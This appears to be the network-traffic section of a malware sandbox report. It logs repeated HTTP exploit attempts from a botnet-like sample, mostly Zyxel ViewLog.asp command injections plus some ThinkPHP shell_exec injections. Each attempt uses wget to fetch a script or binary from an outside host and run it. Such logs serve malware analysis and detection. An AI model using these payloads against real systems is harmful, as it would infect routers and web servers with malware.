                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:03.577189922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:06.489114046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:11.864981890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.616878033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399936914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:28.406778097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      486192.168.2.155866431.136.12.618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.547000885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.233239889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:03.577202082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:06.489106894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:11.864929914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.616801023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399934053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:28.406693935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      487192.168.2.154424895.76.138.1058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.574940920 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      488192.168.2.155235694.123.143.2438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.596172094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      489192.168.2.154833462.29.25.1918080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:01.596326113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      490192.168.2.153711688.96.62.21480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:03.395436049 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:03.596781015 CET503INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:03 GMT
                                                      Server: Apache/2.4.38 (Debian)
                                                      Content-Length: 309
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 74 69 6d 64 61 76 69 64 73 6f 6e 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at timdavidson.co.uk Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      491192.168.2.155188888.221.100.24880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:03.422935009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:03.654779911 CET478INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 256
                                                      Expires: Wed, 14 Feb 2024 08:30:03 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:03 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 35 65 38 63 34 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 33 26 23 34 36 3b 61 35 33 35 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;345e8c4f&#46;1707899403&#46;a53501</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      492192.168.2.1551742112.13.121.10180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:03.594758034 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:04.004897118 CET311INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      493192.168.2.1552590112.171.68.22780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:03.879539967 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:04.296545029 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      494192.168.2.154820231.204.120.128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.073837996 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.282697916 CET304INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:04 GMT
                                                      Server: Apache
                                                      Content-Length: 126
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                      Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      495192.168.2.154787862.96.114.1718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.086051941 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.306818962 CET671INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:30:04 GMT
                                                      Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2
                                                      Vary: accept-language,accept-charset
                                                      Content-Length: 417
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 63 20 50 48 50 2f 37 2e 34 2e 32 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2 Server at 192.168.0.14 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      496192.168.2.153540494.123.254.2478080
